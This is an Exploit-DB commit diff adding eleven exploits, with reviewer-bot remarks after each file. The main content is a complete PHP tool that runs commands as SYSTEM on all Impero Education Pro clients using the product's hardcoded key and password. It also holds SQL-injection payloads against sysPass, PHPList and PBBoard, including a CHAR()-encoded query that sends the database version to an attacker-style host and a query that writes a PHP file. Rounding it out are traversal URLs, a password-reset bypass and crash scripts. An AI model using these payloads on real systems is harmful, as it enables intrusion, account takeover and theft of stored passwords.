DB: 2015-07-15

11 new exploits
Offensive Security 2015-07-15 05:01:36 +00:00
parent 5d9a8808ca
commit 111bcdca4a
12 changed files with 706 additions and 0 deletions

@ -33943,3 +33943,14 @@ id,file,description,date,author,platform,type,port
37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80
37603,platforms/php/webapps/37603.txt,"WordPress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80
37604,platforms/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",php,webapps,80
37607,platforms/windows/dos/37607.py,"Internet Download Manager - (.ief) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
37609,platforms/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,xml,webapps,0
37610,platforms/php/webapps/37610.txt,"sysPass 1.0.9 - SQL Injection",2015-07-14,"SySS GmbH",php,webapps,0
37611,platforms/windows/remote/37611.php,"Impero Education Pro - SYSTEM Remote Command Execution",2015-07-14,slipstream,windows,remote,0
37612,platforms/windows/dos/37612.py,"ZOC Terminal Emulator 7 - (Quick Connection) Crash PoC",2015-07-14,"SATHISH ARTHAR",windows,dos,0
37613,platforms/php/webapps/37613.txt,"PHPList 2.10.18 'index.php' SQL Injection Vulnerability",2012-08-08,"High-Tech Bridge SA",php,webapps,0
37614,platforms/php/webapps/37614.txt,"PBBoard index.php Multiple Parameter SQL Injection",2012-08-08,"High-Tech Bridge",php,webapps,0
37615,platforms/php/webapps/37615.txt,"PBBoard member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0
37616,platforms/php/webapps/37616.txt,"PBBoard admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0
37617,platforms/php/webapps/37617.txt,"dirLIST Multiple Local File Include and Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0
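Review bot: the port column is inconsistent within this hunk: 37602, 37603 and 37604 carry 80 while the other webapps rows (37609, 37610 and 37613 through 37617) carry 0 for the same HTTP targets; pick one convention so the field stays filterable. The 37609 row also files a Pimcore CMS (a PHP application) directory traversal under platform xml, apparently after the payload format rather than the target, which hides it from anyone searching on php. Finally, 37613 to 37617 keep their 2012-08-08 SecurityFocus dates while the rest of the hunk is dated 2015-07-13/14; that is fine for re-imports, but the commit message "DB: 2015-07-15" gives no hint that five of the eleven entries are three-year-old advisories.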

platforms/php/webapps/37610.txt Executable file
@ -0,0 +1,182 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2015-031
Product: sysPass
Vendor: http://cygnux.org/
Affected Version(s): 1.0.9 and below
Tested Version(s): 1.0.9
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Fixed
Vendor Notification: 2014-07-27
Solution Date: 2014-08-04
Public Disclosure: 2015-07-13
CVE Reference: Not yet assigned
Author of Advisory: Daniele Salaris (SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
sysPass is an web based Password Manager written in PHP and Ajax with a
built-in multiuser environment.
An SQL injection vulnerability could be identified in one of the requests
of this web password manager.
The software manufacturer describes the web application as follows
(see [1]):
"sysPass is a web password manager written in PHP that allows the
password management in a centralized way and in a multiuser environment.
The main features are:
* HTML5 and Ajax based interface
* Password encryption with AES-256 CBC.
* Users and groups management.
* Advanced profiles management with 16 access levels.
* MySQL, OpenLDAP and Active Directory authentication.
* Activity alerts by email.
* Accounts change history.
* Accounts files management.
* Inline image preview.
* Multilanguage.
* Links to external Wiki.
* Portable backup.
* Action tracking and event log.
* One-step install process."
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The SQL injection vulnerability was found in an HTTP post request of the
AJAX component from the sysPass software.
The attribute getAccounts is not correctly sanitized and therefore can be
abused to inject arbitrary SQL statements.
This SQL injection vulnerability can be exploited by an authenticated
attacker by sending a specially crafted HTTP POST request (see PoC
section).
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following HTTP request can be used to extract information from the
database:
POST /sysPass-1.0.9/ajax/ajax_search.php HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<HOST>/sysPass-1.0.9/index.php
Content-Length: 249
Cookie: PHPSESSID=<SESSIONID>
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
search=getAccounts') UNION ALL SELECT NULL,NULL,account_name,account_login,account_pass,account_url,NULL,NULL,NULL,NULL,NULL from accounts -- &start=0&skey=1&sorder=1&sk=081bad3198bdb3cd29133befc57d60287541663b&is_ajax=1&customer=0&category=0&rpp=10
The server answers as followed:
HTTP/1.1 200 OK
Date: Fri, 10 Jul 2015 14:06:04 GMT
Server: Apache/2.4.12 (Unix) PHP/5.6.10
X-Powered-By: PHP/5.6.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=<SESSIONID>; path=/; HttpOnly
Content-Length: 1147
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<div id="data-search-header" class="data-header"><ul class="round header-grey"><li class="header-txt"><a onClick="searchSort(5,0)"
title="Sort by Customer" >Customer</a></li><li class="header-txt"><a onClick="searchSort(1,0)" title="Sort by Name">Name</a><img
src="imgs/sort_desc.png" class="icon" /></li><li class="header-txt"><a onClick="searchSort(2,0)" title="Sort by Category">Category</a></li><li
class="header-txt"><a onClick="searchSort(3,0)" title="Sort by Username">User</a></li><li class="header-txt"><a onClick="searchSort(4,0)"
title="Sort by URL / IP">URL / IP</a></li></ul></div><div id="data-search" class="data-rows"><ul><li class="cell-txt txtCliente"></li><li
class="cell-txt">TEST_USER</li><li class="cell-txt">TEST_NAME</li><li class="cell-txt"><DATA></li><li
class="cell-txt">TEST_URL</li><li class="cell-img"><img src="imgs/btn_group.png" title="Groups:<br><br>*<br>" /></li><li
class="cell-actions round"></li></ul></div><div id="pageNav" class="round shadow"><div id="pageNavLeft">1 @ 0.00478 s
<span id="txtFilterOn" class="round">Filter ON</span></div><div id="pageNavRight">&nbsp; 1 / 1 &nbsp;</div></div>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
Update sysPass to the latest software version.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2014-07-27: Vulnerability discovered
2014-07-27: Vulnerability reported to vendor
2014-08-04: Vendor releases new fixed version of sysPass
2015-07-13: Public release of security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Web site of sysPass - sysadmin password manager
http://wiki.syspass.org/en/start
[2] SySS Security Advisory SYSS-2015-031
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-031.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Daniele Salaris of the SySS GmbH.
E-Mail: disclosure (at) syss.de
Key fingerprint = E135 4E23 6091 A85C 9E14 577A 28DF B3A7 0A98 A9D4
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
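Review bot: the Solution section only says "Update sysPass to the latest software version" although Solution Status is Fixed and Solution Date is 2014-08-04; name the first fixed release so operators can check the version they run against it. Vulnerability Details also calls the injection point "the attribute getAccounts", but in the PoC request getAccounts is the value and the injected parameter is `search` in the POST body to ajax/ajax_search.php; stating the parameter makes a detection rule or code fix unambiguous. Worth adding for readers: the UNION selects account_pass, which the Overview says is stored AES-256 CBC encrypted, so the advisory as written shows database read access by an authenticated user, not plaintext credential recovery.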

platforms/php/webapps/37613.txt Executable file
@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/54912/info
PHPList is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to PHPList 2.10.19 are vulnerable.
http://www.example.com/admin/?page=editattributes&id=1&delete=1 union select version() --
http://www.example.com/admin/?page=editattributes&id=1&delete=1 union select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))) --
http://www.example.com/admin/?page=editattributes&id=1&delete=1 union select char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62) --
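Review bot: the write-up never names the injectable parameter or the privilege required; from the three URLs it is `delete` on admin/?page=editattributes, which lives under admin/ and so needs an administrator session, and both facts belong in the text for anyone writing a rule or reviewing the patch. The second and third URLs are follow-on uses of the same injection (a load_file() call on a CHAR()-encoded path, and a char()-encoded script element returned into the page) rather than additional injection points; labelling them that way avoids readers counting three separate bugs. "Versions prior to PHPList 2.10.19 are vulnerable" is the one concrete fix reference here and should be kept.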

platforms/php/webapps/37614.txt Executable file
@ -0,0 +1,48 @@
source: http://www.securityfocus.com/bid/54916/info
PBBoard is prone to multiple security vulnerabilities including:
1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability
Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.
PBBoard 2.1.4 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/index.php?id=1&member=1&page=send&start=1" method="post" name="main" id="main">
<input type="hidden" name="username" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>
<form action="http://www.example.com/index.php?page=forget&send_active_code=1" method="post" name="main" id="main">
<input type="hidden" name="email" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>
<form action="http://www.example.com/index.php?page=forum_archive&password_check=1&id=1" method="post" name="main" id="main">
<input type="hidden" name="password" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>
<form action="http://www.example.com/index.php?page=management&move=1&subject_id=1" method="post" name="main" id="main">
<input type="hidden" name="section" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>
<form action="http://www.example.com/index.php?page=managementreply&startdeleteposts=1&do_replys=1" method="post" name="main" id="main">
<input type="hidden" name="section_id" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="hidden" name="check[]" value="1">
<input type="submit" name="Submit" value="Send">
</form>
<form action="http://www.example.com/index.php?page=new_password&forget=1" method="post" name="main" id="main">
<input type="hidden" name="member_id" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="hidden" name="new_password" value="1">
<input type="submit" name="Submit" value="Send">
</form>
<form action="http://www.example.com/index.php?page=tags&start=1" method="post" name="main" id="main">
<input type="hidden" name="subjectid" value="' union select '<? php_code ?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 INTO OUTFILE '../../../path/to/site/file.php' -- ">
<input type="submit" name="Submit" value="Send">
</form>
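Review bot: the last form (page=tags, parameter subjectid) is not the same class as the six before it: it is a UNION ... INTO OUTFILE write to '../../../path/to/site/file.php', a file-write primitive that additionally depends on the database account being allowed to write files, whereas the first six forms all carry one identical boolean/error-based payload against username, email, password, section, section_id and member_id. The preamble lists three issue classes without mapping them to forms; a one-line label per form, plus the privilege the OUTFILE variant needs, would make the file usable for triage. The same bid/54916 preamble is repeated verbatim in 37615.txt and 37616.txt in this commit.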

platforms/php/webapps/37615.txt Executable file
@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/54916/info
PBBoard is prone to multiple security vulnerabilities including:
1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability
Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.
PBBoard 2.1.4 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/index.php?page=new_password&forget=1" method="post" name="main" id="main">
<input type="hidden" name="member_id" value="1">
<input type="hidden" name="new_password" value="new_password">
<input type="submit" name="Submit" value="Send">
</form>
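Review bot: this file carries the full three-item preamble of 37614.txt but demonstrates only the second item: a password reset for member_id=1 through page=new_password&forget=1 with no token or old-password check in the form. Say so in the first line so readers do not look for the SQL-injection and upload parts here, and state what the server is supposed to validate (the CSV title calls it "member_id Parameter Validation"), since the form alone does not explain why the request is accepted.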

platforms/php/webapps/37616.txt Executable file
@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/54916/info
PBBoard is prone to multiple security vulnerabilities including:
1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability
Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.
PBBoard 2.1.4 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php" method="post" name="main" id="main">
<input type="hidden" name="context" value='<? phpinfo(); ?>'>
<input type="submit" name="Submit" value="Send">
</form>
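Review bot: same copied preamble as 37614/37615, and again nothing tells the reader which of the three items this form covers. What it shows is PHP posted in the `context` field to admin.php?page=addons&export=1&export_writing=1 with xml_name=file.php, so the actual defect is that the export file name, extension included, is caller-controlled, and it is reachable only through admin.php, i.e. with an administrator session. Both facts belong in the description, which would also explain the CSV title "Arbitrary PHP Code Execution" that is otherwise unsupported by the text.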

platforms/php/webapps/37617.txt
@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/54933/info
dirLIST is prone to multiple local file-include vulnerabilities and an arbitrary-file upload vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
http://www.example.com/dirlist_0.3.0/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../windows/win.ini
http://www.example.com/irlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=../../../../../windows/win.ini
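Review bot: the two URLs disagree on the install path (`dirlist_0.3.0` in the first, `irlist_0.3.0` in the second), which looks like a dropped leading character in the second line; fix one or the other. The text also announces an arbitrary-file-upload vulnerability, but only the two image_path traversal requests (show_scaled_image.php and thumb_gen.php) are given, so either the upload part was lost on import or the description should be narrowed to the local file include.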

platforms/windows/dos/37607.py Executable file
@ -0,0 +1,32 @@
#!/usr/bin/env python
# Title : Internet Download Manager - Crash Proof Of Concept
# Affected Versions: All Version
# Founder : InternetDownloadManager
# Tested on Windows 7 / Server 2008
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#
#
# downlWithIDM64.dll Exploit
#
#
# 1 . run python code : python crash.py
# 2 . open "IDM"
# 3 . Tasks --> Import --> From IDM export file
# 4 . select r3z4.ief
# 5 . Crashed ;)
hdr = "<" #start syntax
hcr = "ftp://" #pro
crash = "\x41"*1992999 #B0F
exp = hdr+hcr+crash+hdr+hcr+crash
file = open("r3z4.ief", "w")
file.write(exp)
file.close()
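Review bot: the header claims "Affected Versions: All Version" while the test line names only Windows 7 / Server 2008 and no IDM build number at all; state the tested IDM version and scope the claim to it. The comment block attributes the crash to downlWithIDM64.dll but the script records nothing that supports it (no exception address, module offset or register state), so a triager cannot tell a controllable fault from plain resource exhaustion on a 1,992,999-byte string, which is what the "B0F" comment asserts. Minor: `file` shadows the builtin and the file is opened in text mode; `with open("r3z4.ief", "wb") as f:` is the idiom.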

platforms/windows/dos/37608.py Executable file
@ -0,0 +1,31 @@
#!/usr/bin/env python
# Title : Internet Download Manager - Crash Proof Of Concept
# Affected Versions: All Version
# Founder : InternetDownloadManager
# Tested on Windows 7 / Server 2008
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#
#
# downlWithIDM64.dll Exploit
#
#
# 1 . run python code : python crash.py
# 2 . open r3z4.txt and copy content to clipboard
# 3 . open "IDM"
# 4 . From Menu , Downloads --> Find
# 5 . Paste ClipBoard on "File name or part of the name"
# 6 . Click Find
# 7 . Crashed ;)
crash = "\x41"*10000 #B0F
file = open("r3z4.txt", "w")
file.write(crash)
file.close()
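Review bot: the header block is copied unchanged from 37607.py, including "downlWithIDM64.dll Exploit" and "Affected Versions: All Version", although this PoC goes through a different code path (Downloads > Find, the file-name field, 10,000 bytes instead of 1,992,999), so the component attribution was evidently not revisited; either confirm the faulting module for this path or drop the line. As in 37607 no crash detail is recorded, the output file name r3z4.txt does not match the "python crash.py" instruction, and `file` shadows the builtin.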

platforms/windows/dos/37612.py Executable file
@ -0,0 +1,33 @@
#!/usr/bin/python
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: ZOC Terminal Emulator-v7 Memory Corruption PoC
#[+] Date: 14-07-2015
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows7/windows8
#[+] Vendor: http://www.emtec.com
#[+] Download: http://www.emtec.com/downloads/zoc/zoc7051.exe
#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)
print"###########################################################"
print"# Title: ZOC Terminal Emulator-v7 Memory Corruption PoC #"
print"# Author: SATHISH ARTHAR #"
print"# Category: DoS/PoC # "
print"###########################################################"
print"Copy the content of CRASH.TXT in connect to option and set Connection type to Windows Modems"
print" Quick Connection ----> Connection type: Windows Modems ----> connect"
crash= "A" * 200
filename = "CRASH.TXT"
file = open(filename , "w")
file.write(crash)
print "\n Files Created!\n"
file.close()
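Review bot: the `print"..."` statements are Python 2 only (no parentheses, and no space after print) while the shebang is the unversioned #!/usr/bin/python, so on a host where that resolves to Python 3 the script fails with a SyntaxError before CRASH.TXT is written; either use print() or pin the shebang. The title says "Memory Corruption PoC" but the payload is 200 bytes of "A" and no fault information is recorded, so the memory-corruption claim is unsupported as published and the CSV row's "Crash PoC" is the accurate label. Also `file = open(filename , "w")` shadows the builtin; a `with` block closes the file on every path.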

platforms/windows/remote/37611.php
@ -0,0 +1,196 @@
/*
If you're unsure what Impero is, it's essentially a corporate/educational RAT. Vendor site: https://www.imperosoftware.co.uk/
They recently were in the news about how they implemented "anti-radicalisation" shit or something.
They had a booth at BETT back in January. They gave out donuts. Those were nice. Unfortunately, when I asked about their security, nobody answered me.
Some reversing later, looks like Impero is completely pwned amirite.
The proprietary Impero protocol on the wire is encrypted. With AES-128 CBC. And a hardcoded key and iv that are both derived from sha512(Imp3ro). ISO10126 padding is used.
After connection, a client must authenticate. This is done by sending "-1|AUTHENTICATE\x02PASSWORD". Not even joking here. "PASSWORD" is a seperate string though, so it might be different for some special clients maybe. No idea.
Then, we have full range to do whatever we want. My PoC also does negotiatiation, but I'm not sure if that's needed.
We can get a list of clients with the "SENDCLIENTS" command, then send all the IDs to "SENDCOMMANDMSG" (run CLI command as SYSTEM), or OPENFILE (run visibly an EXE under whatever user, including SYSTEM), or other protocol commands, etc.
There's an OSX version, but I haven't properly looked into that. Run my PoC with the right args and it pops calc on every Windows client as SYSTEM. It also runs "whoami > c:\lol.txt", also as SYSTEM. This second one gets logged serverside, but the server logs it as "unknown" as it doesn't know what client did it.
Basically, if you use Impero, please don't.
Oh yeah -- free speech for the win... internet censorship is <insert some expletives here>, and so are any and all RATs.
- slipstream / RoL^LHQ - @TheWack0lian
PoC code follows. In PHP because lol. PoC works on at least 5.x (latest).
*/
<?php
// Impero Education Pro SYSTEM-RCE PoC
// by slipstream/RoL^LHQ
// greets to everyone in lizardhq! :)
function PadString($str) {
$size = 16;
$pad = $size - (strlen($str) % $size);
$padstr = '';
for ($i = 1; $i < $pad; $i++)
$padstr .= chr(mt_rand(0,255));
return $str.$padstr.chr($pad);
}
function UnPadString($str) {
return substr($str,0,-(ord(substr($str,-1))));
}
function CryptString($str) {
$hash = hash('sha512','Imp3ro',true);
$key = substr($hash,0,0x20);
$iv = substr($hash,0x20,0x10);
$crypted = mcrypt_encrypt(MCRYPT_RIJNDAEL_128,$key,PadString($str),'cbc',$iv);
return $crypted;
}
function DecryptString($str) {
$hash = hash('sha512','Imp3ro',true);
$key = substr($hash,0,0x20);
$iv = substr($hash,0x20,0x10);
return UnPadString(mcrypt_decrypt(MCRYPT_RIJNDAEL_128,$key,$str,'cbc',$iv));
}
function SendNetwork($h,$str) {
global $socketid;
$crypted = CryptString($socketid."|".$str);
socket_write($h,strlen($crypted).'|'.$crypted);
return;
}
function RecvNetwork($h) {
$len = '';
$chr = '';
do {
$len .= $chr;
$chr = socket_read($h,1);
} while ($chr != '|');
$len = (int)($len);
if ($len < 1) die("Something's wrong. Length isn't an int.");
socket_set_block($h);
$crypted = socket_read($h,$len);
$dec = DecryptString($crypted);
global $socketid;
$dec = explode('|',$dec,2);
if ($socketid == -1) $socketid = $dec[0];
return $dec[1];
}
function Connect($host,$port = 30015) {
echo "Connecting...";
$h = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
socket_set_block($h);
if ((!$h) || (!socket_connect($h,$host,$port))) {
echo "failed.\n";
return false;
}
echo "done!\nAuthenticating...";
// authenticate
SendNetwork($h,"AUTHENTICATE\x02PASSWORD");
echo "done!\nWaiting for response...";
// we should get "AUTH:OK" back
$data = RecvNetwork($h);
if ($data != "AUTH:OK") {
echo "authentication failed.\n";
return false;
}
echo "authentication succeeded!\nNegotiating...";
SendNetwork($h,"PING1\x02IE11WIN7\x03\x035003\x019f579e0f20cb18c8bc1ee4f2dc5d9aeb\x01c0d3fd41a05add5e6d7c8b64924bef86\x018dc3a6ceec8a51e1fd2e7e688db44417\x01d1554e349fc677e6011309683ac1b85b\x012b94f70093e484b8fc7f62a4670377ea");
// we get sent 4 loads of packets. discard all.
for ($i = 0; $i < 4; $i++) {
RecvNetwork($h);
usleep(500000);
}
//SendNetwork($h,"-1|ANNOUNCE\x01600\x012\x01-1\x02IE11WIN7\x03IEUser\x03\x031\x03\x030\x031\x036\x0308:00:27:85:C5:CD,08:00:27:D0:C2:E1\x0310.0.2.15,192.168.56.101\x035003\x032015-06-11 12:17:19\x0310.0.2.255,192.168.56.255\x03None,Everyone,Users,INTERACTIVE,CONSOLE LOGON,Authenticated Users,This Organization,Local account,LOCAL,NTLM Authentication\x035003\x032.0.50727.5485\x03IE11WIN7\x03NODOMAIN");
echo "done!\n";
return $h;
}
function GetAllClients($h) {
$pline = "SENDCLIENTS\x01604\x011\x010\x02";
echo "Getting all clients...";
SendNetwork($h,$pline);
$data = RecvNetwork($h);
// grab the base64 blob
$data = array_pop(explode("\x02",$data));
// unbase64 and uncompress
$data = gzdecode(base64_decode($data));
$ret = array();
foreach (explode("\r\n",$data) as $line) {
// we only care about clientIDs
$ret[] = array_shift(explode("\x03",$line));
}
echo "done!\n";
return $ret;
}
function RunCmd($h,$ids,$cmdline) {
global $socketid;
$ids = implode(',',$ids);
$pline = "ECHO\x01\x01".$ids."\x01SENDCOMMANDMSG\x010\x02\x01\x01".$cmdline;
echo "Sending evil RunCMD data...";
SendNetwork($h,$pline);
echo "done!\n";
// if this was a real proper negoiated client we'd get something back
// however, we aren't, and we're masquerading as client #0; thus, we don't.
// this does show up in logs, with the executed command. however, the server doesn't know who ran it, so it shows up as "unknown". :)
}
function RunExeAsSystem($h,$ids,$exe) {
global $socketid;
$ids = implode(',',$ids);
$pline = "ECHO\x01\x01".$ids."\x01OPENFILE\x010\x02".$exe."\x08\x08NT AUTHORITY\SYSTEM\x08Password";
echo "Sending evil RunEXE data...";
SendNetwork($h,$pline);
echo "done!\n";
// we don't get a response from this one
}
function FindImperoServer($if,$addr) {
$sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
socket_set_option($sock, SOL_SOCKET, SO_BROADCAST, 1);
socket_set_option($sock,SOL_SOCKET,IP_MULTICAST_IF,$if);
$str = "ARE_YOU_IMPERO_SERVER";
socket_sendto($sock, $str, strlen($str), MSG_DONTROUTE, $addr, 30016);
socket_set_option($sock,SOL_SOCKET,SO_RCVTIMEO,array("sec"=>6,"usec"=>0));
$r = socket_recvfrom($sock, $buf, 18, 0, $remote_ip, $remote_port);
if ($buf == "I_AM_IMPERO_SERVER") return $remote_ip;
return false;
}
$socketid = -1;
echo "[*] Impero Education Pro SYSTEM-RCE PoC by slipstream/RoL^LHQ\n";
if ($argc < 2) {
echo "[-] Usage: ".$argv[0]." <serverIPs space-delimited>\n";
echo "[*] If you pass \"detect <if> <broadcastmask>\" (without quotes) as serverIP then we will try to find an impero server, using interface and broadcast mask given.\n";
echo "[*] Example of this: ".$argv[0]." detect vboxnet0 192.168.56.255\n";
echo "[*] This PoC will pop a calc and run whoami > C:\lol.txt as SYSTEM on *every connected client*!\n";
die();
}
array_shift($argv);
foreach ($argv as $key=>$arg) {
$detected = false;
if ($arg == "detect") {
if ($key + 2 >= count($argv)) continue;
echo "[*] Finding Impero server...\n";
$arg = FindImperoServer($argv[$key+1],$argv[$key+2]);
if ($arg == false) die("[-] Cannot find Impero server\n");
echo "[+] Found Impero server at ".$arg."\n";
$detected = true;
}
$h = Connect($arg);
if ($h === false) continue;
$clients = GetAllClients($h);
RunExeAsSystem($h,$clients,"calc");
RunCmd($h,$clients,"whoami > C:\lol.txt");
echo "\n";
if ($detected) die();
}
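Review bot: RecvNetwork assumes `socket_read($h,$len)` returns all `$len` bytes, but a TCP read may return fewer, and a truncated ciphertext goes through DecryptString/UnPadString without any error, is split on '|' and can set $socketid to garbage on the first packet; loop until $len bytes are buffered and check for a false return. In FindImperoServer, IP_MULTICAST_IF is an IPPROTO_IP-level option, so passing it with SOL_SOCKET does not select the interface; the datagram still goes out only because SO_BROADCAST is set separately. `array_pop(explode(...))` and `array_shift(explode(...))` pass a temporary by reference and raise a strict-standards notice on the PHP versions of the time. The header names "5.x (latest)" and an OSX build but no exact tested server version. For defenders the two facts that matter are stated plainly in the comment block: key and IV are fixed values derived from sha512("Imp3ro") and the AUTHENTICATE password is a constant string, so the protocol provides neither confidentiality nor client authentication and should be treated as cleartext on the network until the vendor changes the scheme.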

platforms/xml/webapps/37609.txt Executable file
@ -0,0 +1,118 @@
Vulnerability title: Directory Traversal/Configuration Update In Pimcore CMS
CVE: CVE-2015-4425
Vendor: Pimcore
Product: Pimcore CMS
Affected version: Build 3450
Fixed version: Build 3473
Reported by: Josh Foote
Details:
It is possible for an administrative user with the 'assets' permission to overwrite system configuration files via exploiting a directory traversal vulnerability.
The following request can be used to update the system.xml file of the web application:
POST /admin/asset/add-asset-compatibility/?parentId=1&dir=../config HTTP/1.1
Host: pimcore.com
Connection: keep-alive
Content-Length: 1502
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://www.host.com
